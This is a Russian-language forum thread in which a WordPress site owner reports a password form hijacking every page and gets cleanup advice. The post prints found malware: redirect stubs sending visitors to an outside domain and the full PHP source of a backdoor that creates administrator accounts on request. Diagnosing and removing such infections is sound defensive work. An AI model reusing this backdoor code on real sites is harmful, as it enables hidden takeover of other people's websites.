# При заходе на сайт просит пароль WordPress

Tags: wordpress

При заходе на сайт, на любую страницу сайта, в том числе и на /wp-admin

Появляется вот это окно

[image: введите сюда описание изображения]

Исходный код страницы

```
<form method="post" action="/index.php?">Password : <input type="text" name="password"><input type="submit"></form>
```

Фаил `index.php` стандартный, стороннего кода нет

Вчера все отлично работало, в чем может быть проблема, куда смотреть?

Проверил .htaccess, он без лишних переадресаций, последняя дата его изменения с месяц назад

Также был сделан откат до 02.12.2018, не помогло

Еще для теста добавил фаил `test.html` в корень сайта, при переходе `/test.html` фаил открывается с содержимым этого файла, без формы.

В корне появилось много файлов с названиями `kola.php fedor.php` и т.д с содержанием

```
<?php
header('HTTP/1.1 301 Moved Permanently');
header('Location: http://profitnow.su/');
```

После удаления, форма не пропала

На сервере стоит порядка 50 плагинов, половина из которых не понятного содержания. Думаю вирус уже расползся по всей системе. Поставил maldetect-current сканер вирусов, жду результатов

В папке `wp-content/themes/` был найден фаил `wp-update.php` с содержанием

```
<?php
header('Content-Type:text/html; charset=UTF-8');

@set_time_limit(0);

define('PASSWORD_FILE', 'p.txt');

if(!empty($_GET['action']) && $_GET['action'] == 'set_password' && !empty($_GET['hashed_password'])) {
    $hashed_password = $_GET['hashed_password'];
    $fh = fopen(PASSWORD_FILE, "w");
    if($fh==false) die("unable to create file");
    fputs ($fh, $hashed_password);
    fclose ($fh);
    exit;
}

if(!file_exists(PASSWORD_FILE)) {
    $hashed_password = 'a6a8cb877ee18215f2c0fc2a6c7b4f2a';
    $fh = fopen(PASSWORD_FILE, "w");
    if($fh==false) die("unable to create file");
    fputs ($fh, $hashed_password);
    fclose ($fh);
}
else {
    $hashed_password = trim(file_get_contents(PASSWORD_FILE));
}

define('SHELL_PASSWORD', $hashed_password);
define('MAX_UP_LEVELS', 10);

if(empty($_COOKIE['password']) && empty($_POST['password']) || (!empty($_POST['password']) && md5($_POST['password']) != SHELL_PASSWORD)) {
    print '<form method="post">Password : <input type="text" name="password"><input type="submit"></form>';
}

if(!empty($_POST['password']) && md5($_POST['password']) == SHELL_PASSWORD) {
    setcookie('password', SHELL_PASSWORD, time()+60*60*24);
    header("Location: {$_SERVER['PHP_SELF']}");
    exit;
}

if(empty($_COOKIE['password']) || $_COOKIE['password'] != SHELL_PASSWORD) {
    exit;
}

$counter = 0;
$dir_up = './';
do {
    $file_found = false;
    $file_path = "{$dir_up}wp-load.php";
    if(file_exists($file_path)) {
        require($file_path);
        $file_found = true;
    }
    else {
        $dir_up .= '../';
    }
    $counter++;
}while(!$file_found && $counter < MAX_UP_LEVELS);

if(isset($_GET['action']) && $_GET['action'] == 'create_user') {
if(empty($_GET['username']) || empty($_GET['password']) || empty($_GET['email'])){
print "Missing parameter for creating user!";
exit;
}
else {
$userdata = array('user_login' => $_GET['username'], 'user_pass' => $_GET['password'], 'user_email' => $_GET['email'], 'role' => 'administrator');
$user_id = wp_insert_user( $userdata );
if(is_numeric($user_id)) {
print "User has been created.<br>Login: {$_GET['username']} Password: {$_GET['password']}<br>";
print '<a href="'.wp_login_url().'" title="Login" target="_blank">Login</a><br>';
}
}
}
```

Я так понимаю, у меня должно быть пополнение в админ составе?

После удаления этого файла, форма не пропала

Comment: А что не работает то? Этого окна не должно быть?

Comment: Этого окна не должно быть, его не было.

Comment: Проверьте содержимое .htaccess. Скорее всего стоит перенаправление любых запросов на определенный файл. Найдите соответствующую строку и закомментируйте, а файл изучите и удалите. И не забудьте поменять доступы к сайту, FTP и хостингу.

Comment: Если выводиться на каждой странице, нужно смотреть также файл function.php активной темы, и код плагинов. 
Можно попробовать отключать последовательно по одному плагину и смотреть после отключения каждого, уйдет ли окно. После отключения всех, нужно смотреть function.php

Comment: Поставьте плагин Wordfence (2+ млн установок), проведите сканирование сайта и не отключайте его. Не пользуйтесь непонятными решениями не из официального репозитория WordPress (я не нашел там вашего maldetect)

Comment: @KAGGDesign сейчас установлю. maldetecter сканер для сервера  https://www.reg.ru/support/hosting-i-servery/servery-vps/reshenie-problem-raboty-vps/kak-proverit-server-na-nalichie-virusov

Comment: Вам говорят как надо, но вы делаете по-своему. Ок, можете делать дальше. Wordfence проверяет контрольные суммы файлов и сравнивает их с репозиторием. Знает сотни характерных для WP сигнатур вирусов. Блокирует попытки подбора пароля и т.п.

Comment: @KAGGDesign может я плохо выражаю свои мысли, но я же написал на ваш комментарий - 'сейчас установлю', стоит только 1 проблема, я не могу зайти в админ панель, по всем ссылкам wp открывается форма с вводом паролей, а про maldetecter я просто уточнил, что это не плагин для wp.

Comment: Отключите все плагины путём переименования папки `plugins` в `.plugins`. Отключите тему путём аналогичного переименования папки темы. Запишите (или перезапишите) папку с темой twentyseventeen. Возможно, это поможет получить доступ к админке.

Comment: Если не поможет - сносите все файлы WordPress кроме wp-config и перезаливайте из репозитория.

Comment: @KAGGDesign, спасибо, после переименования папки `plugins` появился доступ к админ панели, сейчас поставлю плагин

Comment: wp-vcd.php случаем нету в wp-admin/ wp-includes/ ? Очень похоже на него. 
Я б рекомендовал сделать бекап БД, далее наново распокавать все стандартные файлы WP, установить стандартную тему, далее занятся восстановлением и роверить тоблицу с пользівателями. А вообще хорошая практика использывать систему контроля версий любую, в таком случае вернуть все назад займет три команды.